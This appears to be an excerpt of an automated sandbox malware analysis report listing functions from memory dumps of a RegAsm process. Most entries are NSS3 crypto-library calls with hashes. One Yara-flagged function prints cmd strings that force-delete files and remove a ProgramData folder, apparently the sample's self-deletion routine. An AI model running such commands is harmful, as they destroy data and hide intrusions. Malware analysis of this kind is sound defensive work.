                                                                                                        APIs
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000132), ref: 6C1ECE9E
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000321), ref: 6C1ECEBB
                                                                                                        • PK11_DoesMechanism.NSS3(?,00001081), ref: 6C1ECED8
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000551), ref: 6C1ECEF5
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000651), ref: 6C1ECF12
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000321), ref: 6C1ECF2F
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000121), ref: 6C1ECF4C
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000400), ref: 6C1ECF69
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000341), ref: 6C1ECF86
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000311), ref: 6C1ECFA3
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000301), ref: 6C1ECFBC
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000331), ref: 6C1ECFD5
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000101), ref: 6C1ECFEE
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000141), ref: 6C1ED007
                                                                                                        • PK11_DoesMechanism.NSS3(?,00001008), ref: 6C1ED021
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DoesK11_Mechanism
                                                                                                        • String ID:
                                                                                                        • API String ID: 622698949-0
                                                                                                        • Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                                                                        • Instruction ID: 060f888855c8e642243bc6ebc02fd4cec3ea701523d91f4a3d5ca1cbad9b040a
                                                                                                        • Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                                                                        • Instruction Fuzzy Hash: B13178B1752D1427EF0D10565C61BDF154A4BB930EF48003AFD0AE57C0FA85E75702E5
                                                                                                        Function 6C2C0FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_Lock.NSS3(?), ref: 6C2C1000
                                                                                                          • Part of subcall function 6C279BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C1A1A48), ref: 6C279BB3
                                                                                                          • Part of subcall function 6C279BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C1A1A48), ref: 6C279BC8
                                                                                                        • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C2C1016
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C2C1021
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                        • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C2C1046
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C2C106B
                                                                                                        • PR_Lock.NSS3 ref: 6C2C1079
                                                                                                        • PR_Unlock.NSS3 ref: 6C2C1096
                                                                                                        • free.MOZGLUE(?), ref: 6C2C10A7
                                                                                                        • free.MOZGLUE(?), ref: 6C2C10B4
                                                                                                        • PR_DestroyCondVar.NSS3(?), ref: 6C2C10BF
                                                                                                        • PR_DestroyCondVar.NSS3(?), ref: 6C2C10CA
                                                                                                        • PR_DestroyCondVar.NSS3(?), ref: 6C2C10D5
                                                                                                        • PR_DestroyCondVar.NSS3(?), ref: 6C2C10E0
                                                                                                        • PR_DestroyLock.NSS3(?), ref: 6C2C10EB
                                                                                                        • free.MOZGLUE(?), ref: 6C2C1105
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
                                                                                                        • String ID:
                                                                                                        • API String ID: 8544004-0
                                                                                                        • Opcode ID: 489d89b5726de011d798ad2bb628662b53391b61dbae052fa12007e01759d397
                                                                                                        • Instruction ID: 021e4a34dfe95944eef67380aca809670982fdb4f4240886c7dea2a685fb50ae
                                                                                                        • Opcode Fuzzy Hash: 489d89b5726de011d798ad2bb628662b53391b61dbae052fa12007e01759d397
                                                                                                        • Instruction Fuzzy Hash: CA318DBAA00506ABD701AF14ED42A45B775FF01319B584235EC0952F61EB32F9B8EBD3
                                                                                                        Function 6C1FEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C1FEE0B
                                                                                                          • Part of subcall function 6C210BE0: malloc.MOZGLUE(6C208D2D,?,00000000,?), ref: 6C210BF8
                                                                                                          • Part of subcall function 6C210BE0: TlsGetValue.KERNEL32(6C208D2D,?,00000000,?), ref: 6C210C15
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1FEEE1
                                                                                                          • Part of subcall function 6C1F1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C1F1D7E
                                                                                                          • Part of subcall function 6C1F1D50: EnterCriticalSection.KERNEL32(?), ref: 6C1F1D8E
                                                                                                          • Part of subcall function 6C1F1D50: PR_Unlock.NSS3(?), ref: 6C1F1DD3
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1FEE51
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1FEE65
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1FEEA2
                                                                                                        • free.MOZGLUE(?), ref: 6C1FEEBB
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1FEED0
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1FEF48
                                                                                                        • free.MOZGLUE(?), ref: 6C1FEF68
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1FEF7D
                                                                                                        • PK11_DoesMechanism.NSS3(?,?), ref: 6C1FEFA4
                                                                                                        • free.MOZGLUE(?), ref: 6C1FEFDA
                                                                                                        • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C1FF055
                                                                                                        • free.MOZGLUE(?), ref: 6C1FF060
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2524771861-0
                                                                                                        • Opcode ID: a97262445d30250b8087d644e3bcb8ee07c51ece4ce5d6754493056f2ba5e924
                                                                                                        • Instruction ID: a6570cf3215e65d0132a10a11c5500eebb99036334c723481ef99bce58238073
                                                                                                        • Opcode Fuzzy Hash: a97262445d30250b8087d644e3bcb8ee07c51ece4ce5d6754493056f2ba5e924
                                                                                                        • Instruction Fuzzy Hash: 588170B5A002099FEB00DF65EC85BDE7BF9BF18318F150025ED19A3611E731EA65CBA1
                                                                                                        Function 6C1C4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PK11_SignatureLen.NSS3(?), ref: 6C1C4D80
                                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C1C4D95
                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C1C4DF2
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1C4E2C
                                                                                                        • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C1C4E43
                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C1C4E58
                                                                                                        • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C1C4E85
                                                                                                        • DER_Encode_Util.NSS3(?,?,6C3105A4,00000000), ref: 6C1C4EA7
                                                                                                        • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C1C4F17
                                                                                                        • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C1C4F45
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C1C4F62
                                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C1C4F7A
                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C1C4F89
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C1C4FC8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                        • String ID:
                                                                                                        • API String ID: 2843999940-0
                                                                                                        • Opcode ID: 29849e442ba5ce3f7239484be89fb0ef591ea4157dea4e70b955ce18beb00c71
                                                                                                        • Instruction ID: e8a221224db8ec3f21802aa8ec3f8ecc8521469f2b9a5aa8d5936532811fe0fd
                                                                                                        • Opcode Fuzzy Hash: 29849e442ba5ce3f7239484be89fb0ef591ea4157dea4e70b955ce18beb00c71
                                                                                                        • Instruction Fuzzy Hash: AC81B271A0C3019FE701CF28D840B6BB7E4ABA4758F15856DF958DBA41E738E904CB93
                                                                                                        Function 6C1F8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(6C1F9582), ref: 6C1F8F5B
                                                                                                          • Part of subcall function 6C20BE30: SECOID_FindOID_Util.NSS3(6C1C311B,00000000,?,6C1C311B,?), ref: 6C20BE44
                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C1F8F6A
                                                                                                          • Part of subcall function 6C210FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1B87ED,00000800,6C1AEF74,00000000), ref: 6C211000
                                                                                                          • Part of subcall function 6C210FF0: PR_NewLock.NSS3(?,00000800,6C1AEF74,00000000), ref: 6C211016
                                                                                                          • Part of subcall function 6C210FF0: PL_InitArenaPool.NSS3(00000000,security,6C1B87ED,00000008,?,00000800,6C1AEF74,00000000), ref: 6C21102B
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C1F8FC3
                                                                                                        • PK11_GetIVLength.NSS3(-00000001), ref: 6C1F8FE0
                                                                                                        • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C2DD820,6C1F9576), ref: 6C1F8FF9
                                                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6C1F901D
                                                                                                        • PORT_ZAlloc_Util.NSS3(?), ref: 6C1F903E
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1F9062
                                                                                                        • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C1F90A2
                                                                                                        • PORT_ZAlloc_Util.NSS3(?), ref: 6C1F90CA
                                                                                                        • memcpy.VCRUNTIME140(00000018,?,?), ref: 6C1F90F0
                                                                                                        • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C1F912D
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F9136
                                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C1F9145
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 3626836424-0
                                                                                                        • Opcode ID: d1011db7d26b0053ae4768bb29e748a2b520a06ebc6d2073ccc16c70fd7791fc
                                                                                                        • Instruction ID: 4204162b1bbe23205adc5519f3518b74279f09bba11db31914226b2d3bfb1ae0
                                                                                                        • Opcode Fuzzy Hash: d1011db7d26b0053ae4768bb29e748a2b520a06ebc6d2073ccc16c70fd7791fc
                                                                                                        • Instruction Fuzzy Hash: D951F3B2A082009BE700DF29DC81B97B7E8EF95328F054579ED64C7741E735E94ACB92
                                                                                                        Function 00418271 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00418296
                                                                                                        • _memset.LIBCMT ref: 004182A5
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00418456
                                                                                                        • _memset.LIBCMT ref: 00418465
                                                                                                        • _memset.LIBCMT ref: 00418477
                                                                                                        • ExitProcess.KERNEL32 ref: 00418487
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        Strings
                                                                                                        • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390
                                                                                                        • " & exit, xrefs: 00418389
                                                                                                        • " & exit, xrefs: 004183DA
                                                                                                        • " & rd /s /q "C:\ProgramData\, xrefs: 00418333
                                                                                                        • /c timeout /t 10 & del /f /q ", xrefs: 004182E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                        • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                        • API String ID: 2823247455-1079830800
                                                                                                        • Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                                        • Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
                                                                                                        • Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                                        • Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58
                                                                                                        Function 6C1EADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C1EADE6
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1EAE17
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1EAE29
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1EAE3F
                                                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C1EAE78
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1EAE8A
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1EAEA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                                        • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$n,l
                                                                                                        • API String ID: 332880674-4104680758
                                                                                                        • Opcode ID: a81971b63035e89b71023516b06c4c1d321f81182f9e350ee1fd7af43a80ca87
                                                                                                        • Instruction ID: 09c7fe11e58cc5f62a2d51ea55d1398b3ff66167f58f03d521cd8321d11f31e8
                                                                                                        • Opcode Fuzzy Hash: a81971b63035e89b71023516b06c4c1d321f81182f9e350ee1fd7af43a80ca87
                                                                                                        • Instruction Fuzzy Hash: C131FA75740648AFCB00DF54DD89BAE3BB9AB4A719F454429FC09A7A01DB349808CBD2
                                                                                                        Function 6C2CC8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • calloc.MOZGLUE(00000001,00000020), ref: 6C2CC8B9
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C2CC8DA
                                                                                                        • malloc.MOZGLUE(00000001), ref: 6C2CC8E4
                                                                                                        • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C2CC8F8
                                                                                                        • PR_NewLock.NSS3 ref: 6C2CC909
                                                                                                        • PR_NewCondVar.NSS3(00000000), ref: 6C2CC918
                                                                                                        • PR_NewCondVar.NSS3(00000000), ref: 6C2CC92A
                                                                                                          • Part of subcall function 6C1A0F00: PR_GetPageSize.NSS3(6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F1B
                                                                                                          • Part of subcall function 6C1A0F00: PR_NewLogModule.NSS3(clock,6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F25
                                                                                                        • free.MOZGLUE(00000000), ref: 6C2CC947
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2931242645-0
                                                                                                        • Opcode ID: f3b99c293782242d53387b0f0cb868a5a68fc1f62e72034c506f22740634231b
                                                                                                        • Instruction ID: 4520bb9b508d98890a8d8c737741880c4557650414d645ce3b2080b07cf6e873
                                                                                                        • Opcode Fuzzy Hash: f3b99c293782242d53387b0f0cb868a5a68fc1f62e72034c506f22740634231b
                                                                                                        • Instruction Fuzzy Hash: A121B4B1B006069BEB50EF799C0666B76BCAF05669F140639FC5BC2A40E731D518CBA3
                                                                                                        Function 6C1E2DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_InitPIN), ref: 6C1E2DF6
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E2E24
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E2E33
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E2E49
                                                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C1E2E68
                                                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C1E2E81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$n,l
                                                                                                        • API String ID: 1003633598-1992001104
                                                                                                        • Opcode ID: a2b0d2f644bf11f9241a4be10e4e611569104a33e30aef10cb4d86d33545c7c5
                                                                                                        • Instruction ID: 4cc58826a5913afd1312e60f581f53acaf4cd250f137c81ec54758863e0fee0e
                                                                                                        • Opcode Fuzzy Hash: a2b0d2f644bf11f9241a4be10e4e611569104a33e30aef10cb4d86d33545c7c5
                                                                                                        • Instruction Fuzzy Hash: B8310775701259AFDB00DB54DD5DB8A3779EB4A318F094024EC08A7B11DB349948CBD2
                                                                                                        Function 6C1E6EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C1E6F16
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E6F44
